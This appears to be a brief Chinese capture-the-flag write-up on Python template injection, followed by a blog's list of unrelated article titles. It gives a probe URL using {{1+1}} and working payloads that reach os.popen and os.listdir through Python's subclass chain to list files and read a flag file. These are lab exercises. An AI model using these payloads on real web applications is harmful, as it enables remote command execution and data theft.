0x01 pthon模板注入

判断是否为模板注入

paload

http://124.126.19.106:34164/{{1+1}}

//如果里面的值被执行了,那么存在模板注入


//调用os模块的popen执行ls打印所有文件

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("命令").read()}}

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("ls").read()}}

或者

//调用os模块的listdir打印文件

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir("./")}}

发现fl4g文件,读取文件

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("cat fl4g").read()}}

参考链接:

https://www.pythonf.cn/read/3573

最新文章

  1. 【C#】C#容易忽视的错误
  2. 批量另存mxd
  3. [JS] HTML QQ分享界面js代码
  4. 从一句SQL得出的启示
  5. Java多线程实现......(1,继承Thread类)
  6. Java+7入门经典 - 6 扩展类与继承 Part 1/2
  7. List转换成JSON对象报错(二)
  8. BZOJ4423 Bytehattan
  9. [Winfrom] 使用一个启动快捷方式,打开2个不同的窗体并且共用一个缓存空间
  10. ubuntu16.04LTS更换阿里源
  11. python 关闭垃圾回收
  12. java静态代码块、普通代码
  13. 20172308 实验四《Java面向对象程序设计 》实验报告
  14. linux升级php至5.6
  15. Python的知识点 plt.plot()函数细节
  16. Android——单例模式
  17. 「PKUWC2018」Slay the Spire
  18. 2015526 《Java程序设计》实验二实验报告
  19. [实战]MVC5+EF6+MySql企业网盘实战(18)——文件上传,下载,修改
  20. node.js发http请求

热门文章

  1. 痞子衡嵌入式:简析i.MXRT1170 Cortex-M4 L-MEM ECC功能特点、开启步骤、性能影响
  2. python爬虫面试题集锦及答案
  3. js输入框练习
  4. 0day堆(2)堆的调试实验
  5. 几年前的今天,Google发了这几篇“大”新闻
  6. 腾讯技术工程 | 基于Prophet的时间序列预测
  7. 难道你现在还不知道:C/S和B/S
  8. codeforce 1311 C. Perform the Combo 前缀和
  9. P2290 [HNOI2004]树的计数(bzoj1211)
  10. python(MD5 单向加密)